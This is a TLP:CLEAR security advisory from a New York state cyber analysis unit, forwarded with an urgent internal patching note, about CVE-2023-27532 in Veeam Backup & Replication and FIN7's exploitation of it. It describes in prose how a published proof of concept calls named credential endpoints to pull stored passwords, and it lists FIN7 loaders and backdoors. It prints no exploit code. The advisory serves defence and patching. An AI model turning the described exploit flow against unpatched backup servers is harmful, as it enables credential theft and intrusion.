[ An exploit for the vulnerability in Veeam that was alerted on 3/9 has now been developed and published. Please ensure all vulnerable Veam instances are remediated IMMEDIATELY; I see some in Tenable that may still have the vulnerability – Robert ]
TLP: CLEAR
Recipients can spread this to the world, there is no limit on disclosure. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction.
https://www.first.org/tlp/
Summary: Cybersecurity firm Horizon3 Attack Team (@Horizon3Attack) published a write-up and proof-of-concept (POC) exploit for CVE-2023-27532 (weblink below), a high severity vulnerability in Veeam Backup & Replication that allows an unauthenticated user to request the encrypted credentials stored in its configuration database. Veeam Backup & Replication, developed by Veeam Software, provides backup, restore, and replication capabilities for virtual machines (VMs), physical servers, and cloud-based workloads. Reportedly, the bug is present in the Veeam backup service (which runs on port 9401 by default) to request the host credentials in cleartext format, via exploitation of parsed GUID’s prefixed by $. These credentials can be used by an attacker to gain access to the backup infrastructure hosts.
According to Horizon3 Attack Team, Veeam’s backup service uses the Windows Communication Foundation (WCF) framework for communication. To successfully invoke the Veeam backup service, the POC creates a client compatible with WCF that also disables certificate validation and contains a DNSIdentity that matches the target server. Once connected to the service, the client then invokes the CredentialsDbScopeGetAllCreds method and CredentialsDbScopeFindCredentials endpoint to obtain a binary blob from the Veeam database, which contains credential information. The POC uses a custom serializer to extract usernames and passwords in the binary blob and shows the extracted credentials in the command line interface.
Veeam released new versions (build 12 and 11a) of Veeam Backup & Replication (weblink below) to fix the vulnerability.
Horizon3 Report: hxxps://www.horizon3[.]ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/
Veeam Blog: hxxps://www.veeam[.]com/kb4424
NYSIC CAU Analyst Note: The activity has been attributed to the financially motivated cybercrime group FIN7 with high confidence. The malicious actors used the Microsoft SQL server executable to execute a shell command on targeted systems, which performed in-memory download and execution of a PowerShell script. The script was the obfuscated POWERTRASH loader that contains an embedded DICELOADER payload, executed through reflective PE injection. The DICELOADER backdoor was used to gain a foothold in compromised machines to conduct post-exploitation procedures. FIN7 also used a custom PowerShell script, tracked as POWERHOLD, to create a persistence mechanism to execute DICELOEAER on device startup. A .NET loader, dubbed DUBLOADER, was sideloaded in order to execute an on-disk payload. Numerous PowerShell scripts were also used for credential theft, lateral movement, and information gathering.
Sources:
hxxps://www.securityweek[.]com/fin7-hackers-caught-exploiting-recent-veeam-vulnerability/
hxxps://www.computerweekly[.]com/news/365535586/Ransomware-gang-exploiting-unpatched-Veeam-backup-products
hxxps://www.helpnetsecurity[.]com/2023/03/10/cve-2023-27532/
This information has been disseminated to:
NYSIC CAU Contacts – OCT-CIP
NYSIC CAU Contacts – ITS EISO
NYSIC CAU Contacts – Cyber Partners Working Group (CPWG)
NYSIC CAU Contacts – Critical Infrastructure: All
NYSIC CAU Contacts – SLTT
NYSIC CAU Contacts – Private Sector
For more information, please contact the NYSIC Cyber Analysis Unit at (518) 786-2191 or CAU@nysic.ny.gov.
TLP: CLEAR
Recipients can spread this to the world, there is no limit on disclosure. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules,
TLP:CLEAR information may be shared without restriction.
https://www.first.org/tlp/